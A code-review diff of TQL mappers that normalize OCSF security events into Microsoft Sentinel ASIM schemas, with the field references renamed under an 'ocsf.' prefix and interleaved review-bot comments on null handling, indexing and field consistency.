@@ -2,23 +2,23 @@ description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events. --- -microsoft::asim::ocsf::helpers::common - assert class_uid == 3001 +microsoft::asim::ocsf::helpers::common + @name = "asim.user_management" asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "UserCreated" } "Delete" => { asim.EventType = "UserDeleted" } "Update" => { asim.EventType = "UserModified" } 
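Review bot: `asim.ActorUsernameType = "Windows"` is only set inside the domain-qualified branch, so when the username falls back to `email_addr`, a bare `name`, `uid`, `app_name` or `app_uid` the type stays null; as far as I recall ASIM defines `UPN` and `Simple` for exactly those shapes, and a consumer that filters on the type field would drop these rows. The same pattern recurs for `TargetUsernameType` in the next hunk and in the authentication, authorize_session, entity_management, event_log_activity, file_system_activity and group_management hunks of this patch. Separately, `assert class_uid == 3001` carries no `message=` while every field assertion in the mappers does, and its new position before the helper deserves a one-line explanation: `// class guard runs on the raw event; after the helper, source fields live under ocsf` followed by `assert class_uid == 3001, message={reason: "unexpected OCSF class for UserManagement mapper", class_uid: class_uid, class_name: class_name}`.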
@@ -31,17 +31,17 @@ match activity_name { _ => { asim.EventType = "UserModified" } } -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.GroupName = group?.name? -asim.GroupId = group?.uid? +asim.GroupName = ocsf.group?.name? +asim.GroupId = ocsf.group?.uid? asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 30189e8..40db64a 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -7,11 +7,11 @@ microsoft::asim::ocsf::helpers::common @name = "asim.authentication" asim.EventSchema = "Authentication" asim.EventSchemaVersion = "0.1.4" -match activity_name { +match ocsf.activity_name { "Logoff" => { asim.EventType = "Logoff" } _ => { asim.EventType = "Logon" } } -match logon_type? { +match ocsf.logon_type? { "System" => { asim.EventSubType = "System" } "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { asim.EventSubType = "Interactive" 
@@ -23,36 +23,36 @@ match logon_type? { "OS Service" => { asim.EventSubType = "Service" } _ => {} } -if logon_type? != null { - asim.EventOriginalSubType = logon_type +if ocsf.logon_type? != null { + asim.EventOriginalSubType = ocsf.logon_type } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" - asim.TargetDomain = user.domain + asim.TargetDomain = ocsf.user.domain asim.TargetDomainType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.TargetSessionId = session?.uid? else session?.uid_alt? -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? 
-asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? -asim.TargetAppId = service?.uid? else dst_endpoint?.uid? -asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? -asim.LogonProtocol = auth_protocol? -if auth_factors? != null { - asim.LogonMethod = auth_factors[0]?.factor_type? +asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? +asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? +asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? +asim.LogonProtocol = ocsf.auth_protocol? +if ocsf.auth_factors? != null { + asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 076665b..574f6d5 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "Authentication" asim.EventSchemaVersion = "0.1.4" asim.EventType = "Elevate" -match logon_type? { +match ocsf.logon_type? { "System" => { asim.EventSubType = "System" } "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { asim.EventSubType = "Interactive" 
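Review bot: `if ocsf.auth_factors? != null` admits an empty list, after which `ocsf.auth_factors[0]?.factor_type?` indexes past the end; whether the trailing `?` on `[0]?` silences that is not visible here, so the guard should also require a non-empty list before indexing. The identical lines appear in the authorize_session hunk below. `asim.LogonMethod` is also taken from the first factor only, which for multi-factor logons silently discards the others; a comment such as `// ASIM LogonMethod is a single value; only the first factor is surfaced` would keep the next reader from reading it as an oversight. The enclosing mapper starts outside the hunk.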
@@ -20,36 +20,36 @@ match logon_type? { "OS Service" => { asim.EventSubType = "Service" } _ => {} } -if logon_type? != null { - asim.EventOriginalSubType = logon_type +if ocsf.logon_type? != null { + asim.EventOriginalSubType = ocsf.logon_type } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" - asim.TargetDomain = user.domain + asim.TargetDomain = ocsf.user.domain asim.TargetDomainType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.TargetSessionId = session?.uid? else session?.uid_alt? -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.SrcPortNumber = src_endpoint?.port? 
-asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? -asim.TargetAppId = service?.uid? else dst_endpoint?.uid? -asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? -asim.LogonProtocol = auth_protocol? -if auth_factors? != null { - asim.LogonMethod = auth_factors[0]?.factor_type? +asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.SrcPortNumber = ocsf.src_endpoint?.port? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? +asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? +asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? +asim.LogonProtocol = ocsf.auth_protocol? +if ocsf.auth_factors? != null { + asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 08331ac..d02093d 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql 
@@ -8,19 +8,19 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" -asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -asim.AlertName = finding_info?.title? else message? -asim.EventReportUrl = finding_info?.url? else null +asim.AlertName = ocsf.finding_info?.title? else ocsf.message? +asim.EventReportUrl = ocsf.finding_info?.url? else null asim.EventSubType = "Compliance Violation" -asim.ThreatName = malware?[0]?.name? else finding_info?.title? +asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = "Security Policy Violation" -asim.ThreatOriginalCategory = finding_info?.types?[0]? -asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? -asim.UserId = user?.uid? else actor?.user?.uid? +asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? +asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? +asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null -match status? { +match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" } 
@@ -29,8 +29,8 @@ match status? { } _ => {} } -asim.AlertOriginalStatus = status? -match verdict? { +asim.AlertOriginalStatus = ocsf.status? +match ocsf.verdict? { "True Positive" => { asim.AlertVerdict = "True Positive" } "False Positive" => { asim.AlertVerdict = "False Positive" } "Benign" => { asim.AlertVerdict = "Benign Positive" } @@ -38,4 +38,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 96c313c..795ee08 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql 
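Review bot: `asim.EventReportUrl = ocsf.finding_info?.url? else null` has a redundant `else null`, since the `?` access already yields null when the field is absent, so `asim.EventReportUrl = ocsf.finding_info?.url?` reads cleaner; the same line appears in the detection_finding hunk below. The constant `asim.ThreatCategory = "Security Policy Violation"` for every compliance finding deserves a comment stating that it is a deliberate fixed mapping rather than a placeholder, given that detection_finding looks the category up from `$threat_categories`: `// compliance findings always map to one ASIM category; the OCSF type is kept in ThreatOriginalCategory`.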
@@ -23,19 +23,19 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" -asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -asim.AlertName = finding_info?.title? else message? -asim.EventReportUrl = finding_info?.url? else null +asim.AlertName = ocsf.finding_info?.title? else ocsf.message? +asim.EventReportUrl = ocsf.finding_info?.url? else null asim.EventSubType = "Threat" -asim.ThreatName = malware?[0]?.name? else finding_info?.title? -asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? -asim.ThreatOriginalCategory = finding_info?.types?[0]? -asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? -asim.UserId = user?.uid? else actor?.user?.uid? +asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? +asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? +asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? +asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? +asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null -match status? { +match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" } 
@@ -44,8 +44,8 @@ match status? { } _ => {} } -asim.AlertOriginalStatus = status? -match verdict? { +asim.AlertOriginalStatus = ocsf.status? +match ocsf.verdict? { "True Positive" => { asim.AlertVerdict = "True Positive" } "False Positive" => { asim.AlertVerdict = "False Positive" } "Benign" => { asim.AlertVerdict = "Benign Positive" } @@ -53,4 +53,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 9306362..1d6b638 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -7,16 +7,16 @@ microsoft::asim::ocsf::helpers::common @name = "asim.dhcp_event" asim.EventSchema = "DhcpEvent" asim.EventSchemaVersion = "0.1.1" -match activity_name { +match ocsf.activity_name { "Ack" | "Offer" => { asim.EventType = "Assign" } "Request" => { asim.EventType = "Renew" } "Release" => { asim.EventType = "Release" } _ => { asim.EventType = "Assign" } } -asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcMacAddr = src_endpoint?.mac? +asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcMacAddr = ocsf.src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} 
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 91555f0..8c71da7 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -7,20 +7,20 @@ microsoft::asim::ocsf::helpers::common @name = "asim.dns" asim.EventSchema = "Dns" asim.EventSchemaVersion = "0.1.7" -asim.EventType = query?.opcode? else "Query" -match activity_name { +asim.EventType = ocsf.query?.opcode? else "Query" +match ocsf.activity_name { "Query" => { asim.EventSubType = "request" } "Response" => { asim.EventSubType = "response" } _ => {} } -asim.DnsQuery = query?.hostname? -asim.DnsQueryTypeName = query?.type? -asim.DnsQueryClassName = query?.class? -asim.EventResultDetails = rcode? else "NA" -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? -asim.DstIpAddr = dst_endpoint?.ip? -asim.DstHostname = dst_endpoint?.hostname? -assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.DnsQuery = ocsf.query?.hostname? +asim.DnsQueryTypeName = ocsf.query?.type? +asim.DnsQueryClassName = ocsf.query?.class? +asim.EventResultDetails = ocsf.rcode? else "NA" +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? +asim.DstIpAddr = ocsf.dst_endpoint?.ip? +asim.DstHostname = ocsf.dst_endpoint?.hostname? +assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 05e4eb1..02cf88f 100644 
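Review bot: `asim.EventResultDetails = ocsf.rcode? else "NA"` copies the OCSF response-code label verbatim, but as far as I recall OCSF uses mixed-case names such as `NXDomain` while the ASIM Dns schema lists response codes in upper case (`NXDOMAIN`); if that holds, detections keyed on the ASIM vocabulary would miss these rows, so either normalize with `ocsf.rcode?.to_upper()` or add a lookup, and record the decision in a comment. `asim.EventType = ocsf.query?.opcode? else "Query"` likewise passes the opcode label through without checking it against the ASIM EventType list, and a comment naming which opcodes are expected to appear would help. The mapper starts outside the hunk.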
--- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } 
@@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Directory Service Object" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? 
+asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index d428ef1..d2b2c71 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -8,7 +8,7 @@ microsoft::asim::ocsf::helpers::common asim.EventSchema = "AuditEvent" asim.EventSchemaVersion = "0.1.2" asim.EventType = "Other" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "Create" } "Read" => { asim.EventType = "Read" } "Update" | "Set" => { asim.EventType = "Set" } 
@@ -22,19 +22,19 @@ match activity_name { "Stop" => { asim.EventType = "Stop" } _ => {} } -asim.Operation = activity_name? else type_name? else asim.EventType -asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType +asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? +assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Event Log" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.TargetHostname = dst_endpoint?.hostname? -asim.TargetIpAddr = dst_endpoint?.ip? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? 
+asim.TargetHostname = ocsf.dst_endpoint?.hostname? +asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index ac54b6c..15bb103 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -7,7 +7,7 @@ microsoft::asim::ocsf::helpers::common @name = "asim.file_event" asim.EventSchema = "FileEvent" asim.EventSchemaVersion = "0.2.2" -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "FileCreated" } "Read" | "Open" => { asim.EventType = "FileAccessed" } "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } 
@@ -15,23 +15,23 @@ match activity_name { "Rename" => { asim.EventType = "FileRenamed" } _ => { asim.EventType = "FileCreatedOrModified" } } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? -asim.TargetFilePath = file?.path? else file?.name? -asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] -if activity_name == "Rename" and file_result? != null { +asim.ActorUserId = ocsf.actor?.user?.uid? +asim.TargetFilePath = ocsf.file?.path? else ocsf.file?.name? +asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1] +if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.SrcFilePath = asim.TargetFilePath asim.SrcFileName = asim.TargetFileName asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" - asim.TargetFilePath = file_result.path? else asim.TargetFilePath - asim.TargetFileName = file_result.name? else asim.TargetFileName + asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath + asim.TargetFileName = ocsf.file_result.name? 
else asim.TargetFileName } asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" assert asim.ActorUsername != null and asim.TargetFilePath != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 69f3038..b978972 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql 
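Review bot: `asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1]` derives the name by splitting on a backslash only, so for a path the same file later classifies as `Unix Local` (no backslash) the whole path becomes the file name. Pick the separator the same way `TargetFilePathType` does: `asim.TargetFileName = ocsf.file?.name? else (asim.TargetFilePath?.split("\\")[-1] if (asim.TargetFilePath?.contains("\\") else false) else asim.TargetFilePath?.split("/")[-1])`. In the rename branch, `ocsf.file_result.name? else asim.TargetFileName` keeps the pre-rename name when only `file_result.path` is present, so `TargetFilePath` and `TargetFileName` then disagree; deriving the name from the new path in that case keeps them consistent. The mapper starts outside the hunk.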
